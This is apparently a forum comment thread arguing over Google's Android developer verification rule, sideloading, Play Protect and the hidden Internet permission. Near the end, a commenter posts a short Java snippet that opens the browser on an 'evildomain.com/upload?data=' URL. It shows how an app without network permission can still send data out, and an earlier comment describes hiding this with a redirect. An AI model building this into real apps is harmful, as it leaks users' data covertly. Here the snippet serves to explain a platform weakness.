
Comment by 87636899376

20 days ago

Official announcement: https://android-developers.googleblog.com/2025/08/elevating-...

More info:

https://developer.android.com/developer-verification

https://support.google.com/googleplay/android-developer/answ...

Personally...we all know the Play Store is chock full of malicious garbage, so the verification requirements there don't do jack to protect users. The way I see it, this is nothing but a power grab, a way for Google to kill apps like Revanced for good. They'll just find some bullshit reason to suspend your developer account if you do something they don't like.

Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.

> we will be confirming who the developer is, not reviewing the content of their app or where it came from

This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.

TFA had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.

On the flip side, that's one less platform I care about supporting with my projects. We're down to just Linux and Windows if you're not willing to sell your soul (no, I will not be making a Google account) just for the right to develop for a certain platform.

It's never about security (at least not users' security). It's like you pointed out only about power and locking in customers. They don't care if your phone gets hacked or your bank account drained. They care about the bottom line. Android is fine. Google should have 2 layers if they're worried: playstore 1 has only well vetted authors and apps, playstore 2 can be the free for all (mostly) of the current store. These could be two different apps or prominent tags. Choice is good, lock down is bad. Corporate does not like employees or customers to have freedom, that's why it's our duty to fire people like the current US regime who always side with corporations over customers.

  • This is a drastic response, but they didn't make up the security threat. Attackers convincing users to side-load malware is a thing.

    https://www.bitdefender.com/en-us/blog/hotforsecurity/hacker...

    • The thing is that people sideloading good non-malware apps because they want to is also a thing, and all kinds of icky apps that abuse permissions but are still verified and installed through the Play Store are also a thing. This doesn't really change what is a thing. It just moves more stuff under Google's control.

    • Security is the "Save the Children" of technology. It's not that there isn't a theoretical thing there, it's that in the real material sense, the actual actions taken are power grabs for control and suppression.

    • > Attackers convincing users to side-load malware is a thing.

      Sure. It’s also not Google’s problem.

      It’s not Victorinox’s problem if someone uses a Swiss Army knife to cut someone else. It’s not Toyota’s problem if someone deliberately runs over a pedestrian.


  • It's the security of having happier shareholders, making more money.

    That's still security, albeit an entirely different threat model.

> Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.

You've never needed the internet permission to exfiltrate data. Just send an intent to the browser app to load a page owned by the attacker with the data to be exfilled in the query parameters.

  • Wouldn't that launch the browser app and bring it to the foreground? I wouldn't compare that to having full network access.

    • It'd launch the browser app. You can have your evil page redirect to a benign page so it just looks like Chrome randomly opened or whatever. It is not as powerful as full network access as you can only send so much information in query parameters, but if you are doing some phishing or stealing sms 2fa codes or whatever then it is plenty to send back whatever payload you wanted to.

      And of course basically every app requires internet permissions for ordinary behavior. The world where an explicit internet permission would somehow get somebody to look askance at some malware that they were about to download is just not believable.

> had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.

I don't think we can know for sure before the change is actually in place. Going through Play Protect would certainly be the easiest way of implementing this - it would be a simple change from "Play Protect rejects known malware" to "Play Protect rejects any app that isn't properly notarized". This would narrowly address the issue where the existing malware checks are made ineffective by pushing some new variant of the malicious app with a different package id.

It's a big change for the ecosystem nonetheless because it will require all existing developers to register for verification if they want to publish a "legit" app that won't be rejected by any common Android device - and the phrasing of the official announcements accurately reflects this. But this says nothing much as of yet about whether power users will be allowed to proactively disable these checks (just like they can turn off Play Protect today, even though very few people do so in practice).

> This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.

Requiring company verification helps against some app pretending to be made by a legitimate institution, e.g. your bank.

Requiring public key registration for package name protects against package modification with malware. Typical issue - I want to download an app that's not available "in my country" - because I'm on a holiday and want to try some local app, but my "play store country" is tied to my credit card and the developer only made it available in his own country thinking it would be useless for foreigners. I usually try to download it from APKMirror. APKMirror tries to do signature verification. But I may not find it on APKMirror but only on some sketchy site. The sketchy site may not do any signature verification so I can't be sure that I downloaded an original unmodified APK instead of the original APK injected with some malware.

Both of these can be done without actually scanning the package contents. They are essentially just equivalents of EV SSL certificates and DANE/TLSA from TLS world.

  • > Typical issue - I want to download an app that's not available "in my country" - because I'm on a holiday and want to try some local app,

    The solution here is just to get rid of artificial country limitations which make some users download APKs. None of those make sense in the online world anyways.
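The signing-key check described in the comment above (a registered key per package name, checked without scanning the package contents), written out as an added example; it is not code from the thread or from Google. The registry, package name and digests are constructed, and the parser assumes the `Signer #N certificate SHA-256 digest:` lines printed by `apksigner verify --print-certs`.

```python
import re

# Hypothetical registry: package name -> SHA-256 digests of its registered
# signing certificates. Constructed placeholder values, not real digests.
REGISTERED = {"com.example.localapp": {"ab" * 32}}

DIGEST_RE = re.compile(
    r"^Signer #\d+ certificate SHA-256 digest: ([0-9a-fA-F]{64})\s*$", re.M)

def signer_digests(apksigner_output):
    """Collect every signer certificate digest reported for the APK."""
    return {m.group(1).lower() for m in DIGEST_RE.finditer(apksigner_output)}

def check_apk(package, verified, apksigner_output):
    """Decide whether an APK obtained outside the store has the registered signer.

    `verified` is whether `apksigner verify` exited 0, i.e. the signature
    itself is intact; the digest only says who signed, so both are needed.
    """
    if not verified:
        return "verification-failed"
    pinned = REGISTERED.get(package)
    if pinned is None:
        return "unregistered-package"
    found = signer_digests(apksigner_output)
    if not found:
        return "no-signer-found"
    # Every signer must be registered: a repackaged APK is re-signed with
    # a different key, so its digest is absent from the pinned set.
    return "ok" if found <= pinned else "signer-mismatch"

# Constructed sample outputs (not captured from a real APK).
ORIGINAL = (
    "Signer #1 certificate DN: CN=Example Local App\n"
    "Signer #1 certificate SHA-256 digest: " + "AB" * 32 + "\n"
    "Signer #1 certificate SHA-1 digest: " + "cd" * 20 + "\n")
REPACKAGED = ORIGINAL.replace("AB" * 32, "12" * 32)

if __name__ == "__main__":
    for name, out in (("original", ORIGINAL), ("repackaged", REPACKAGED)):
        print(name, check_apk("com.example.localapp", True, out))
```

The check says nothing about whether the app is benign, only that the file was signed by the key registered for that package name.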

> we will be confirming who the developer is, not reviewing the content of their app or where it came from

To be honest, it almost makes me wonder if the issue here is not related to security at all. I am not being sarcastic. What I mean is, maybe the issue revolves around some of the issues MS had with GitHub (sanctions and KYC checks).

Play Protect is just spyware to monitor app usage & exploitation. It doesn't prevent or protect anything.

> Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps

Or that they still refuse to sandbox the play store.

It's easy to see that there's a pattern on what they are copying from GrapheneOS.

  • > Or that they still refuse to sandbox the play store.

    It's absolutely essential that Google Play Services have "root" permissions and circumvent the permissions system normal apps have. How else would Google have access to all of your data? :)

Can you elaborate a little bit about this hidden internet access control setting?

The future for the security conscious will be something like GrapheneOS for phones, but a step further where the device can only securely connect to your home computer and access regular software there. If you must, run segregated, whitelist-only networking, virtual machine apps.

Doesn't Windows have the same thing aka Code Signing?

https://www.electronforge.io/guides/code-signing/code-signin...

  • You can install unsigned apps on Windows just fine, maybe with one extra nag screen. Plenty of large open source projects don't sign their installers - VLC being one big example that many normal people use.

    • IIRC Windows is testing to turn that nag screen into a "no you don't". Which is such BS given all the evidence we have that malware vendors and bad actors have and continue to get their malware signed by MS because they simply can't reliably detect it.


> But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.

The internet permission has nothing to do with ads? It's a hidden permission because:

1) Internet connection is so ubiquitous as to just be noise if displayed

2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar

  • It absolutely has to do with ads. While there are various ways to exfiltrate small amounts of data, the non-collaborative ones are rarely silent and most importantly, they won't let the app get responses (e.g. ads) back.

    The main thing this permission would be used for would be blocking ads. Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?

    • > The main thing this permission would be used for would be blocking ads.

      This permission has existed for longer than runtime permissions. You have never been able to revoke it, it was just something you agreed to when you installed the app or you didn't install the app.

      It was "removed" in that era because if every app requests the same permission, then nobody cares about it anymore. When every app asks for the same thing, users stop paying attention to it. So no, it had fuck all to do with ads because that was never a thing in the first place. And ad blocking doesn't require this permission, either.

      > Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?

      You can still use it for this. Apps are required to declare the permission still, it's listed on the Play Store under the "permissions" section. Similarly the OS reports the same thing. Presumably F-droid or whatever else also has a list of permissions before you install, and it'll be listed there.

      Although Google's own Calculator app requires Internet permission. Take that for what it's worth.

  • > 1) Internet connection is so ubiquitous as to just be noise if displayed

    That doesn't make it any less useful.

    > 2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar

    I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it. But even if it is flawed, don't you think Google would be a bit more incentivized to make the Internet permission work as expected if people could disable it?

    • > I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it.

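         import android.content.Intent;
         import android.net.Uri;
         // Inside an Activity: hand the URL to whichever app handles ACTION_VIEW (usually the browser).
         Uri uri = Uri.parse("https://evildomain.com/upload?data=DATA_GOES_HERE");
         Intent i = new Intent(Intent.ACTION_VIEW, uri);
         startActivity(i);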
      

      Happily uses the browser app to do the data send for you. Requiring apps to have all the permissions of the recipient of an Intent before being allowed to send it would be a catastrophic change to the ecosystem.


  • I mean, I just did a quick look over the installed apps on this phone and ~1/4 of them would work perfectly well without an internet connection, things like a level or GPS speedometer that use the phone sensor or apps for Bluetooth control of devices [like 0]. Why would something like a bubble level app need internet access for anything besides telemetry or ads? I realize I have way more of these types of apps than the average user, but apps like this aren't a super-niche thing that would be on 0.1% of devices.

    I just tend to give Google little benefit of the doubt here, considering where their revenue comes from. Same as when they introduced manifest v3, ostensibly for security but just conveniently happening to neuter adblocking. Disabling access to the internet permission for apps aligns with their profit motive.

    • There's plenty of actually problematic stuff Google does (like this change in the article), there's no need to make up whack ass conspiracy theories, too.


What is the hidden internet permission called? Is there any way to enable or see it?

  • No, you can’t enable it; nowadays developers just declare if they want internet permission. Before, users could say « no, I don’t want you to have internet access ».

    It’s something possible only on GrapheneOS as far as I know.

"we all know... Play Store... full of malicious garbage" - please point out how that statement is true, given we all know this apparently.

Yes, there are apps out there that try to trick the system and when you use them, instead of looking innocent, it's actually a casino app or something. But Google usually finds those. Are there any apps impersonating a bank? Because that is what regular people care about & think of when someone says "malicious".

They don't care if an app tracks what other apps are installed, what the user taps on, etc. Arguably they should care, but they don't lose money from it.

There's a reason Google is targeting a few specific countries with this first. Malware from APKs downloaded from the internet is more prominent in some countries than in others. The governments themselves are asking for this because educating the public has turned out to be an impossible task for them.

Still an awful solution that will get bypassed easily, of course. But there's more to this than "Google decided to be a bunch of dicks today".

  • The malware makers will use fake or stolen IDs.

    • I'm not saying this is a good idea, am I?

      A lot of people are pretending there is no malware problem and that Google should just do nothing and move on. That's not helpful.

      This bullshit needs to be aborted as soon as possible, but a solution for mobile malware is desperately needed. The crutch used on desktop, invasive antivirus, doesn't work on Android unless it comes from the OS manufacturer, so we need a new solution.